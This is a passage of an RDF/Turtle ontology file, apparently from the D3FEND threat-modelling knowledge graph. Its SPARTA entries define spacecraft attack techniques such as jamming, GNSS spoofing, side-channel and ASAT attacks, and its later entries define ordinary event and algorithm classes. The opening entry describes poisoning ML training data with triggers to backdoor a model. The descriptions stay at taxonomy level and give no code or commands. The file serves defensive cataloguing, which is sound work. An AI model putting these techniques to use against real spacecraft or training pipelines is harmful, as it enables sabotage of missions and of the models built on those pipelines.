actor has access to the dataset used to train a machine learning model, they might want to inject tainted examples that have a “trigger” in them. With the datasets typically used for AI/ML (i.e., thousands and millions of data points), it would not be hard for a threat actor to inject poisoned examples without going noticed. When the AI model is trained, it will associate the trigger with the given category and for the threat actor to activate it, they only need to provide the data that contains the trigger in the right location. In effect, this means that the threat actor has gained backdoor access to the machine learning model." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0012 ; skos:prefLabel "Poison AI/ML Training Data" . d3f:EX-0013.01 a owl:Class ; rdfs:label "Valid Commands - SPARTA" ; d3f:attack-id "EX-0013.01" ; d3f:definition "Threat actors may utilize valid commanding as a mechanism for flooding as the processing of these valid commands could expend valuable resources like processing power and battery usage. Flooding the spacecraft bus, sub-systems or link layer with valid commands can create temporary denial of service conditions for the spacecraft while the spacecraft is consumed with processing these valid commands." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0013 ; skos:prefLabel "Valid Commands" . d3f:EX-0013.02 a owl:Class ; rdfs:label "Erroneous Input - SPARTA" ; d3f:attack-id "EX-0013.02" ; d3f:definition "Threat actors inject noise/data/signals into the target channel so that legitimate messages cannot be correctly processed due to impacts to integrity or availability. Additionally, while this technique does not utilize system-relevant signals/commands/information, the target spacecraft may still consume valuable computing resources to process and discard the signal." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0013 ; skos:prefLabel "Erroneous Input" . d3f:EX-0014.01 a owl:Class ; rdfs:label "Time Spoof - SPARTA" ; d3f:attack-id "EX-0014.01" ; d3f:definition "Threat actors may attempt to target the internal timers onboard the victim spacecraft and spoof their data. The Spacecraft Event Time (SCET) is used for various programs within the spacecraft and control when specific events are set to occur. Ground controllers use these timed events to perform automated processes as the spacecraft is in orbit in order for it to fulfill it's purpose. Threat actors that target this particular system and attempt to spoof it's data could cause these processes to trigger early or late." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0014 ; skos:prefLabel "Time Spoof" . d3f:EX-0014.02 a owl:Class ; rdfs:label "Bus Traffic Spoofing - SPARTA" ; d3f:attack-id "EX-0014.02" ; d3f:definition "Threat actors may attempt to target the main or secondary bus onboard the victim spacecraft and spoof their data. The spacecraft bus often directly processes and sends messages from the ground controllers to the various subsystems within the spacecraft and between the subsystems themselves. If a threat actor would target this system and spoof it internally, the subsystems would take the spoofed information as legitimate and process it as normal. This could lead to undesired effects taking place that could damage the spacecraft's subsystems, hosted payload, and critical data." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0014 ; skos:prefLabel "Bus Traffic Spoofing" . d3f:EX-0014.03 a owl:Class ; rdfs:label "Sensor Data - SPARTA" ; d3f:attack-id "EX-0014.03" ; d3f:definition "Threat actors may target sensor data on the spacecraft to achieve their attack objectives. Sensor data is typically inherently trusted by the spacecraft therefore an attractive target for a threat actor. Spoofing the sensor data could affect the calculations and disrupt portions of a control loop as well as create uncertainty within the mission thereby creating temporary denial of service conditions for the mission. Affecting the integrity of the sensor data can have varying impacts on the spacecraft depending on decisions being made by the spacecraft using the sensor data. For example, spoofing data related to attitude control could adversely impact the spacecrafts ability to maintain orbit." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0014 ; skos:prefLabel "Sensor Data" . d3f:EX-0014.04 a owl:Class ; rdfs:label "Position, Navigation, and Timing (PNT) Spoofing - SPARTA" ; d3f:attack-id "EX-0014.04" ; d3f:definition "Threat actors may attempt to spoof Global Navigation Satellite Systems (GNSS) signals (i.e. GPS, Galileo, etc.) to disrupt or produce some desired effect with regard to a spacecraft's position, navigation, and/or timing (PNT) functions." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0014 ; skos:prefLabel "Position, Navigation, and Timing (PNT) Spoofing" . d3f:EX-0014.05 a owl:Class ; rdfs:label "Ballistic Missile Spoof - SPARTA" ; d3f:attack-id "EX-0014.05" ; d3f:definition "Threat actors may launch decoys designed to spoof ballistic missile signatures in order to deceive missile defense systems into launching interceptors. Such techniques could be used to preoccupy defenses before an actual attack, or deplete resources to inhibit the targets ability to intercept later attacks." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0014 ; skos:prefLabel "Ballistic Missile Spoof" . d3f:EX-0015 a owl:Class ; rdfs:label "Side-Channel Attack - SPARTA" ; d3f:attack-id "EX-0015" ; d3f:definition "Threat actors may use a side-channel attack attempts to gather information or influence the program execution of a system by measuring or exploiting indirect effects of the spacecraft. Side-Channel attacks can be active or passive. From an execution perspective, fault injection analysis is an active side channel technique, in which an attacker induces a fault in an intermediate variable, i.e., the result of an internal computation, of a cipher by applying an external stimulation on the hardware during runtime, such as a voltage/clock glitch or electromagnetic radiation. As a result of fault injection, specific features appear in the distribution of sensitive variables under attack that reduce entropy. The reduced entropy of a variable under fault injection is equivalent to the leakage of secret data in a passive attacks." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAExecutionTechnique ; skos:prefLabel "Side-Channel Attack" . d3f:EX-0016.01 a owl:Class ; rdfs:label "Uplink Jamming - SPARTA" ; d3f:attack-id "EX-0016.01" ; d3f:definition """An uplink jammer is used to interfere with signals going up to a satellite by creating enough noise that the satellite cannot distinguish between the real signal and the noise. Uplink jamming of the control link, for example, can prevent satellite operators from sending commands to a satellite. However, because the uplink jammer must be within the field of view of the antenna on the satellite receiving the command link, the jammer must be physically located within the vicinity of the command station on the ground.* *https://aerospace.csis.org/aerospace101/counterspace-weapons-101""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0016 ; skos:prefLabel "Uplink Jamming" . d3f:EX-0016.02 a owl:Class ; rdfs:label "Downlink Jamming - SPARTA" ; d3f:attack-id "EX-0016.02" ; d3f:definition """Downlink jammers target the users of a satellite by creating noise in the same frequency as the downlink signal from the satellite. A downlink jammer only needs to be as powerful as the signal being received on the ground and must be within the field of view of the receiving terminal’s antenna. This limits the number of users that can be affected by a single jammer. Since many ground terminals use directional antennas pointed at the sky, a downlink jammer typically needs to be located above the terminal it is attempting to jam. This limitation can be overcome by employing a downlink jammer on an air or space-based platform, which positions the jammer between the terminal and the satellite. This also allows the jammer to cover a wider area and potentially affect more users. Ground terminals with omnidirectional antennas, such as many GPS receivers, have a wider field of view and thus are more susceptible to downlink jamming from different angles on the ground.* *https://aerospace.csis.org/aerospace101/counterspace-weapons-101""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0016 ; skos:prefLabel "Downlink Jamming" . d3f:EX-0016.03 a owl:Class ; rdfs:label "Position, Navigation, and Timing (PNT) Jamming - SPARTA" ; d3f:attack-id "EX-0016.03" ; d3f:definition "Threat actors may attempt to jam Global Navigation Satellite Systems (GNSS) signals (i.e. GPS, Galileo, etc.) to inhibit a spacecraft's position, navigation, and/or timing functions." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0016 ; skos:prefLabel "Position, Navigation, and Timing (PNT) Jamming" . d3f:EX-0017.01 a owl:Class ; rdfs:label "Direct Ascent ASAT - SPARTA" ; d3f:attack-id "EX-0017.01" ; d3f:definition """A direct-ascent ASAT is often the most commonly thought of threat to space assets. It typically involves a medium- or long-range missile launching from the Earth to damage or destroy a satellite in orbit. This form of attack is often easily attributed due to the missile launch which can be easily detected. Due to the physical nature of the attacks, they are irreversible and provide the attacker with near real-time confirmation of success. Direct-ascent ASATs create orbital debris which can be harmful to other objects in orbit. Lower altitudes allow for more debris to burn up in the atmosphere, while attacks at higher altitudes result in more debris remaining in orbit, potentially damaging other spacecraft in orbit.* *https://aerospace.csis.org/aerospace101/counterspace-weapons-101""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0017 ; skos:prefLabel "Direct Ascent ASAT" . d3f:EX-0017.02 a owl:Class ; rdfs:label "Co-Orbital ASAT - SPARTA" ; d3f:attack-id "EX-0017.02" ; d3f:definition """Co-orbital ASAT attacks are when another satellite in orbit is used to attack. The attacking satellite is first placed into orbit, then later maneuvered into an intercepting orbit. This form of attack requires a sophisticated on-board guidance system to successfully steer into the path of another satellite. A co-orbital attack can be a simple space mine with a small explosive that follows the orbital path of the targeted satellite and detonates when within range. Another co-orbital attack strategy is using a kinetic-kill vehicle (KKV), which is any object that can be collided into a target satellite.* *https://aerospace.csis.org/aerospace101/counterspace-weapons-101""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0017 ; skos:prefLabel "Co-Orbital ASAT" . d3f:EX-0018.01 a owl:Class ; rdfs:label "Electromagnetic Pulse (EMP) - SPARTA" ; d3f:attack-id "EX-0018.01" ; d3f:definition """An EMP, such as those caused by high-altitude detonation of certain bombs, is an indiscriminate form of attack in space. For example, a nuclear detonation in space releases an electromagnetic pulse (EMP) that would have near immediate consequences for the satellites within range. The detonation also creates a high radiation environment that accelerates the degradation of satellite components in the affected orbits.* *https://aerospace.csis.org/aerospace101/counterspace-weapons-101""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0018 ; skos:prefLabel "Electromagnetic Pulse (EMP)" . d3f:EX-0018.02 a owl:Class ; rdfs:label "High-Powered Laser - SPARTA" ; d3f:attack-id "EX-0018.02" ; d3f:definition """A high-powered laser can be used to permanently or temporarily damage critical satellite components (i.e. solar arrays or optical centers). If directed toward a satellite’s optical center, the attack is known as blinding or dazzling. Blinding, as the name suggests, causes permanent damage to the optics of a satellite. Dazzling causes temporary loss of sight for the satellite. While there is clear attribution of the location of the laser at the time of the attack, the lasers used in these attacks may be mobile, which can make attribution to a specific actor more difficult because the attacker does not have to be in their own nation, or even continent, to conduct such an attack. Only the satellite operator will know if the attack is successful, meaning the attacker has limited confirmation of success, as an attacked nation may not choose to announce that their satellite has been attacked or left vulnerable for strategic reasons. A high-powered laser attack can also leave the targeted satellite disabled and uncontrollable, which could lead to collateral damage if the satellite begins to drift. A higher-powered laser may permanently damage a satellite by overheating its parts. The parts most susceptible to this are satellite structures, thermal control panels, and solar panels.* *https://aerospace.csis.org/aerospace101/counterspace-weapons-101""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0018 ; skos:prefLabel "High-Powered Laser" . d3f:EX-0018.03 a owl:Class ; rdfs:label "High-Powered Microwave - SPARTA" ; d3f:attack-id "EX-0018.03" ; d3f:definition """High-powered microwave (HPM) weapons can be used to disrupt or destroy a satellite’s electronics. A “front-door” HPM attack uses a satellite’s own antennas as an entry path, while a “back-door” attack attempts to enter through small seams or gaps around electrical connections and shielding. A front-door attack is more straightforward to carry out, provided the HPM is positioned within the field of view of the antenna that it is using as a pathway, but it can be thwarted if the satellite uses circuits designed to detect and block surges of energy entering through the antenna. In contrast, a back-door attack is more challenging, because it must exploit design or manufacturing flaws, but it can be conducted from many angles relative to the satellite. Both types of attacks can be either reversible or irreversible; however, the attacker may not be able to control the severity of the damage from the attack. Both front-door and back-door HPM attacks can be difficult to attribute to an attacker, and like a laser weapon, the attacker may not know if the attack has been successful. A HPM attack may leave the target satellite disabled and uncontrollable which can cause it to drift into other satellites, creating further collateral damage.* *https://aerospace.csis.org/aerospace101/counterspace-weapons-101""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0018 ; skos:prefLabel "High-Powered Microwave" . d3f:EXF-0001 a owl:Class ; rdfs:label "Replay - SPARTA" ; d3f:attack-id "EXF-0001" ; d3f:definition "Threat actors may exfiltrate data by replaying commands and capturing the telemetry or payload data as it is sent down. One scenario would be the threat actor replays commands to downlink payload data once the spacecraft is within certain location so the data can be intercepted on the downlink by threat actor ground terminals." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAExfiltrationTechnique ; skos:prefLabel "Replay" . d3f:EXF-0002.01 a owl:Class ; rdfs:label "Power Analysis Attacks - SPARTA" ; d3f:attack-id "EXF-0002.01" ; d3f:definition "Threat actors can analyze power consumption on-board the spacecraft to exfiltrate information. In power analysis attacks, the threat actor studies the power consumption of devices, especially cryptographic modules. Power analysis attacks require close proximity to a sensor node, such that a threat actor can measure the power consumption of the sensor node. There are two types of power analysis, namely simple power analysis (SPA) and differential power analysis (DPA). In differential power analysis, the threat actor studies the power analysis and is able to apply mathematical and statistical principles to determine the intermediate values." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EXF-0002 ; skos:prefLabel "Power Analysis Attacks" . d3f:EXF-0002.02 a owl:Class ; rdfs:label "Electromagnetic Leakage Attacks - SPARTA" ; d3f:attack-id "EXF-0002.02" ; d3f:definition "Threat actors can leverage electromagnetic emanations to obtain sensitive information. The electromagnetic radiations attain importance when they are hardware generated emissions, especially emissions from the cryptographic module. Electromagnetic leakage attacks have been shown to be more successful than power analysis attacks on chicards. If proper protections are not in place on the spacecraft, the circuitry is exposed and hence leads to stronger emanations of EM radiations. If the circuitry is exposed, it provides an easier environment to study the electromagnetic emanations from each individual component." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EXF-0002 ; skos:prefLabel "Electromagnetic Leakage Attacks" . d3f:EXF-0002.03 a owl:Class ; rdfs:label "Traffic Analysis Attacks - SPARTA" ; d3f:attack-id "EXF-0002.03" ; d3f:definition "In a terrestrial environment, threat actors use traffic analysis attacks to analyze traffic flow to gather topological information. This traffic flow can divulge information about critical nodes, such as the aggregator node in a sensor network. In the space environment, specifically with relays and constellations, traffic analysis can be used to understand the energy capacity of spacecraft node and the fact that the transceiver component of a spacecraft node consumes the most power. The spacecraft nodes in a constellation network limit the use of the transceiver to transmit or receive information either at a regulated time interval or only when an event has been detected. This generally results in an architecture comprising some aggregator spacecraft nodes within a constellation network. These spacecraft aggregator nodes are the sensor nodes whose primary purpose is to relay transmissions from nodes toward the ground station in an efficient manner, instead of monitoring events like a normal node. The added functionality of acting as a hub for information gathering and preprocessing before relaying makes aggregator nodes an attractive target to side channel attacks. A possible side channel attack could be as simple as monitoring the occurrences and duration of computing activities at an aggregator node. If a node is frequently in active states (instead of idle states), there is high probability that the node is an aggregator node and also there is a high probability that the communication with the node is valid. Such leakage of information is highly undesirable because the leaked information could be strategically used by threat actors in the accumulation phase of an attack." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EXF-0002 ; skos:prefLabel "Traffic Analysis Attacks" . d3f:EXF-0002.04 a owl:Class ; rdfs:label "Timing Attacks - SPARTA" ; d3f:attack-id "EXF-0002.04" ; d3f:definition "Threat actors can leverage timing attacks to exfiltrate information due to variances in the execution timing for different sub-systems in the spacecraft (i.e., cryptosystem). In spacecraft, due to the utilization of processors with lower processing powers (i.e. slow), this becomes all the more important because slower processors will enhance even small difference in computation time. Every operation in a spacecraft takes time to execute, and the time can differ based on the input; with precise measurements of the time for each operation, a threat actor can work backwards to the input. Finding secrets through timing information may be significantly easier than using cryptanalysis of known plaintext, ciphertext pairs. Sometimes timing information is combined with cryptanalysis to increase the rate of information leakage." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EXF-0002 ; skos:prefLabel "Timing Attacks" . d3f:EXF-0002.05 a owl:Class ; rdfs:label "Thermal Imaging attacks - SPARTA" ; d3f:attack-id "EXF-0002.05" ; d3f:definition "Threat actors can leverage thermal imaging attacks (e.g., infrared images) to measure heat that is emitted as a means to exfiltrate information from spacecraft processors. Thermal attacks rely on temperature profiling using sensors to extract critical information from the chip(s). The availability of highly sensitive thermal sensors, infrared cameras, and techniques to calculate power consumption from temperature distribution [7] has enhanced the effectiveness of these attacks. As a result, side-channel attacks can be performed by using temperature data without measuring power pins of the chip." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EXF-0002 ; skos:prefLabel "Thermal Imaging attacks" . d3f:EXF-0003.01 a owl:Class ; rdfs:label "Uplink Exfiltration - SPARTA" ; d3f:attack-id "EXF-0003.01" ; d3f:definition "Threat actors may target the uplink connection from the victim ground infrastructure to the target spacecraft in order to exfiltrate commanding data. Depending on the implementation (i.e., encryption) the captured uplink data can be used to further other attacks like command link intrusion, replay, etc." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EXF-0003 ; skos:prefLabel "Uplink Exfiltration" . d3f:EXF-0003.02 a owl:Class ; rdfs:label "Downlink Exfiltration - SPARTA" ; d3f:attack-id "EXF-0003.02" ; d3f:definition "Threat actors may target the downlink connection from the victim spacecraft in order to exfiltrate telemetry or payload data. This data can include health information of the spacecraft or mission data that is being collected/analyzed on the spacecraft. Downlinked data can even include mirrored command sessions which can be used for future campaigns or to help perpetuate other techniques." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EXF-0003 ; skos:prefLabel "Downlink Exfiltration" . d3f:EXF-0004 a owl:Class ; rdfs:label "Out-of-Band Communications Link - SPARTA" ; d3f:attack-id "EXF-0004" ; d3f:definition "Threat actors may attempt to exfiltrate data via the out-of-band communication channels. While performing eavesdropping on the primary/second uplinks and downlinks is a method for exfiltration, some spacecrafts leverage out-of-band communication links to perform actions on the spacecraft (i.e., re-keying). These out-of-band links would occur on completely different channels/frequencies and often operate on separate hardware on the spacecraft. Typically these out-of-band links have limited built-for-purpose functionality and likely do not present an initial access vector but they do provide ample exfiltration opportunity." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAExfiltrationTechnique ; skos:prefLabel "Out-of-Band Communications Link" . d3f:EXF-0005 a owl:Class ; rdfs:label "Proximity Operations - SPARTA" ; d3f:attack-id "EXF-0005" ; d3f:definition "Threat actors may leverage the lack of emission security or tempest controls to exfiltrate information using a visiting spacecraft. This is similar to side-channel attacks but leveraging a visiting spacecraft to measure the signals for decoding purposes." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAExfiltrationTechnique ; skos:prefLabel "Proximity Operations" . d3f:EXF-0006.01 a owl:Class ; rdfs:label "Software Defined Radio - SPARTA" ; d3f:attack-id "EXF-0006.01" ; d3f:definition "Threat actors may target software defined radios due to their software nature to setup exfiltration channels. Since SDRs are programmable, when combined with supply chain or development environment attacks, SDRs provide a pathway to setup covert exfiltration channels for a threat actor." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EXF-0006 ; skos:prefLabel "Software Defined Radio" . d3f:EXF-0006.02 a owl:Class ; rdfs:label "Transponder - SPARTA" ; d3f:attack-id "EXF-0006.02" ; d3f:definition "Threat actors may change the transponder configuration to exfiltrate data via radio access to an attacker-controlled asset." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EXF-0006 ; skos:prefLabel "Transponder" . d3f:EXF-0007 a owl:Class ; rdfs:label "Compromised Ground System - SPARTA" ; d3f:attack-id "EXF-0007" ; d3f:definition "Threat actors may compromise target owned ground systems that can be used for future campaigns or to perpetuate other techniques. These ground systems have already been configured for communications to the victim spacecraft. By compromising this infrastructure, threat actors can stage, launch, and execute an operation. Threat actors may utilize these systems for various tasks, including Execution and Exfiltration." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAExfiltrationTechnique ; skos:prefLabel "Compromised Ground System" . d3f:EXF-0008 a owl:Class ; rdfs:label "Compromised Developer Site - SPARTA" ; d3f:attack-id "EXF-0008" ; d3f:definition "Threat actors may compromise development environments located within the ground system or a developer/partner site. This attack can take place in a number of different ways, including manipulation of source code, manipulating environment variables, or replacing compiled versions with a malicious one. This technique is usually performed before the target spacecraft is in orbit, with the hopes of adding malicious code to the actual FSW during the development process." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAExfiltrationTechnique ; skos:prefLabel "Compromised Developer Site" . d3f:EXF-0009 a owl:Class ; rdfs:label "Compromised Partner Site - SPARTA" ; d3f:attack-id "EXF-0009" ; d3f:definition "Threat actors may compromise access to partner sites that can be used for future campaigns or to perpetuate other techniques. These sites are typically configured for communications to the primary ground station(s) or in some cases the spacecraft itself. Unlike mission operated ground systems, partner sites may provide an easier target for threat actors depending on the company, roles and responsibilities, and interests of the third-party. By compromising this infrastructure, threat actors can stage, launch, and execute an operation. Threat actors may utilize these systems for various tasks, including Execution and Exfiltration." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAExfiltrationTechnique ; skos:prefLabel "Compromised Partner Site" . d3f:EXF-0010 a owl:Class ; rdfs:label "Payload Communication Channel - SPARTA" ; d3f:attack-id "EXF-0010" ; d3f:definition "Threat actors can deploy malicious software on the payload(s) which can send data through the payload channel. Payloads often have their own communication channels outside of the main TT&C pathway which presents an opportunity for exfiltration of payload data or other spacecraft data depending on the interface and data exchange." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAExfiltrationTechnique ; skos:prefLabel "Payload Communication Channel" . d3f:ElectricalSignal a owl:Class ; rdfs:label "Electrical Signal" ; d3f:definition "Time-varying voltage or current that carries information." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Signal . d3f:ElectromagneticSignal a owl:Class ; rdfs:label "Electromagnetic Signal" ; d3f:definition "An electromagnetic wave that carries information." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Signal . d3f:ElectronicCombinationLockEvent a owl:Class ; rdfs:label "Electronic Combination Lock Event" ; rdfs:comment "An event occuring when combination lock's bolt changes position." ; rdfs:seeAlso "NRC Regulatory Guide 5.12 Rev1" ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:ElectronicCombinationLock ], d3f:PhysicalAccessAlarmEvent . d3f:EmailAttachment a owl:Class, owl:NamedIndividual ; rdfs:label "Email Attachment" ; d3f:attached-to d3f:Email ; d3f:definition "An email attachment is a computer file sent along with an email message. One or more files can be attached to any email message, and be sent along with it to the recipient. This is typically used as a simple method to share documents and images." ; rdfs:isDefinedBy ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:attached-to ; owl:someValuesFrom d3f:Email ], d3f:DocumentFile . d3f:EmailReceiveEvent a owl:Class ; rdfs:label "Email Receive Event" ; d3f:definition "An event where an email is delivered to a recipient's mail server or mailbox. This includes receiving messages from internal or external sources via protocols such as IMAP, POP3, or their secure variants." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:EmailSendEvent ], d3f:EmailEvent . d3f:EmailScanEvent a owl:Class ; rdfs:label "Email Scan Event" ; d3f:definition "An event where an email is inspected or analyzed for content, security, or compliance purposes. Scanning often involves identifying spam, detecting malware, or ensuring policy adherence before delivery or after reception." ; rdfs:subClassOf d3f:EmailEvent . d3f:EmbeddedDatabaseApplication a owl:Class, owl:NamedIndividual ; rdfs:label "Embedded Database Application" ; d3f:definition "A software application that integrates a database management system (DBMS) directly within its own structure, rather than relying on a separate, standalone database server. Examples include SQLite and Berkeley DB." ; d3f:executes d3f:DatabaseQuery ; d3f:manages d3f:Database ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:manages ; owl:someValuesFrom d3f:Database ], [ a owl:Restriction ; owl:onProperty d3f:executes ; owl:someValuesFrom d3f:DatabaseQuery ], d3f:DatabaseApplication . d3f:Enclave a owl:Class, owl:NamedIndividual ; rdfs:label "Enclave" ; d3f:definition "Network enclaves consist of standalone assets that do not interact with other information systems or networks. A major difference between a DMZ or demilitarized zone and a network enclave is a DMZ allows inbound and outbound traffic access, where firewall boundaries are traversed. In an enclave, firewall boundaries are not traversed. Enclave protection tools can be used to provide protection within specific security domains. These mechanisms are installed as part of an Intranet to connect networks that have similar security requirements." ; d3f:may-contain d3f:LocalAreaNetwork ; rdfs:isDefinedBy ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:may-contain ; owl:someValuesFrom d3f:LocalAreaNetwork ], d3f:DigitalInformationBearer ; skos:altLabel "Network Enclave" . d3f:EncoderApplication a owl:Class ; rdfs:label "Encoder Application" ; d3f:definition "An application that encodes digital data." ; rdfs:subClassOf d3f:CodecApplication . d3f:EncryptedPassword a owl:Class ; rdfs:label "Encrypted Password" ; d3f:definition "A password that is encrypted." ; rdfs:subClassOf d3f:EncryptedCredential, d3f:Password . d3f:EpistemicLogic a owl:Class, owl:NamedIndividual ; rdfs:label "Epistemic Logic" ; d3f:d3fend-id "D3A-EL" ; d3f:definition "Epistemic logic addresses modalities of knowledge; i.e., the certainty of sentences." ; d3f:kb-article """## References 1. Epistemic logic. (2023, June 4). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Modal_logic#Epistemic_logic)""" ; d3f:synonym "Epistemic Modal Logic" ; rdfs:subClassOf d3f:ModalLogic . d3f:EventLogArchiveEvent a owl:Class ; rdfs:label "Event Log Archive Event" ; d3f:definition "An event involving the archiving of event log data, typically to preserve historical records in a compressed or secure format." ; rdfs:subClassOf d3f:EventLogEvent . d3f:EventLogClearEvent a owl:Class ; rdfs:label "Event Log Clear Event" ; d3f:definition "An event where the event log data is cleared from the system, often as part of log maintenance or potentially to cover tracks." ; rdfs:subClassOf d3f:EventLogEvent . d3f:EventLogDeleteEvent a owl:Class ; rdfs:label "Event Log Delete Event" ; d3f:definition "An event where the event log database, file, or cache is deleted from the system, removing the log's historical records." ; rdfs:subClassOf d3f:EventLogEvent . d3f:EventLogDisableEvent a owl:Class ; rdfs:label "Event Log Disable Event" ; d3f:definition "An event indicating that the event logging service has been disabled, preventing it from collecting or recording logs." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:EventLogEnableEvent ], d3f:EventLogEvent . d3f:EventLogExportEvent a owl:Class ; rdfs:label "Event Log Export Event" ; d3f:definition "An event representing the export of event log data to a file or external system for backup or analysis purposes." ; rdfs:subClassOf d3f:EventLogEvent . d3f:EventLogRestartEvent a owl:Class ; rdfs:label "Event Log Restart Event" ; d3f:definition "An event representing the restarting of the event logging service, often performed during system maintenance or troubleshooting." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:EventLogStopEvent ], [ a owl:Restriction ; owl:onProperty d3f:precedes ; owl:someValuesFrom d3f:EventLogStartEvent ], d3f:EventLogEvent . d3f:EventLogRotateEvent a owl:Class ; rdfs:label "Event Log Rotate Event" ; d3f:definition "An event where the event log is rotated, often as part of log rotation policies to manage storage and ensure continuity." ; rdfs:subClassOf d3f:EventLogEvent . d3f:EvictionEvent a owl:Class, owl:NamedIndividual ; rdfs:label "Eviction Event" ; d3f:definition "An event describing actions to remove adversaries or malicious resources from a system, re-establishing security and operational integrity." ; d3f:related d3f:Evict ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:DetectionEvent ], d3f:SecurityEvent . d3f:ExactMatching a owl:Class, owl:NamedIndividual ; rdfs:label "Exact Matching" ; d3f:d3fend-id "D3A-EM" ; d3f:definition "Exact matching for numeric types is just the simple test for mathematical equivalence of the values being matched." ; d3f:kb-article """## References 1. Equality (mathematics). (2023, May 31). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Equality_(mathematics)]""" ; d3f:synonym "Numeric Equivalence Matching" ; rdfs:subClassOf d3f:EquivalenceMatching, d3f:NumericPatternMatching . d3f:ExceptionHandler a owl:Class ; rdfs:label "Exception Handler" ; d3f:definition "An exception handler is a code segment that processes an exception." ; rdfs:seeAlso ; rdfs:subClassOf d3f:Subroutine . d3f:Expectation-maximizationClustering a owl:Class, owl:NamedIndividual ; rdfs:label "Expectation-maximization Clustering" ; d3f:d3fend-id "D3A-EMC" ; d3f:definition "An unsupervised clustering algorithm and extends to NLP applications like Latent Dirichlet Allocation, the Baum-Welch algorithm for Hidden Markov Models, and medical imaging." ; d3f:kb-article """## References Towards Data Science. (n.d.). Expectation Maximization Explained. [Link](https://towardsdatascience.com/expectation-maximization-explained-c82f5ed438e5#:~:text=Expectation%20Maximization%20(EM)%20is%20a,Markov%20Models%2C%20and%20medical%20imaging.)""" ; rdfs:subClassOf d3f:Distribution-basedClustering . d3f:ExpectedErrorReduction a owl:Class, owl:NamedIndividual ; rdfs:label "Expected Error Reduction" ; d3f:d3fend-id "D3A-EER" ; d3f:definition "Expected Error Reduction (EER) follows similar ideas as EMC, but again looks at the model output instead of the model itself and also takes the other data into account. In particular, a sample x is considered useful, if we can expect that knowing the label will reduce the future error on unseen samples" ; d3f:kb-article """## References Intro to Active Learning. inovex Blog. [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).""" ; rdfs:subClassOf d3f:ActiveLearning . d3f:ExpectedModelChange a owl:Class, owl:NamedIndividual ; rdfs:label "Expected Model Change" ; d3f:d3fend-id "D3A-EMC" ; d3f:definition "Supervised learning establishes a relationship between the known input and output variables to conduct a predictive analysis." ; d3f:kb-article """nal Consiterations ## References Intro to Active Learning. inovex Blog. [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).""" ; rdfs:subClassOf d3f:ActiveLearning . d3f:FQDNDomainName a d3f:DomainName, owl:NamedIndividual ; rdfs:label "FQDN Domain Name" . d3f:FTPDeleteEvent a owl:Class ; rdfs:label "FTP Delete Event" ; d3f:definition "An event where files or directories are removed from an FTP server, resulting in their permanent deletion from the remote system." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FTPPutEvent ], d3f:FTPEvent . d3f:FTPGetEvent a owl:Class ; rdfs:label "FTP Get Event" ; d3f:definition "An event where a file is downloaded from an FTP server to a client, retrieving data from the remote system to the local destination." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FTPPutEvent ], d3f:FTPEvent . d3f:FTPListEvent a owl:Class ; rdfs:label "FTP List Event" ; d3f:definition "An event where the contents of a directory on an FTP server are listed, providing metadata such as file names, sizes, and timestamps." ; rdfs:subClassOf d3f:FTPEvent . d3f:FTPPollEvent a owl:Class ; rdfs:label "FTP Poll Event" ; d3f:definition "An event where a client queries an FTP server to check for the presence of specific files or directories without initiating a transfer." ; rdfs:subClassOf d3f:FTPEvent . d3f:FTPRenameEvent a owl:Class ; rdfs:label "FTP Rename Event" ; d3f:definition "An event where files or directories on an FTP server are renamed, modifying their identifiers without altering their content or location." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom 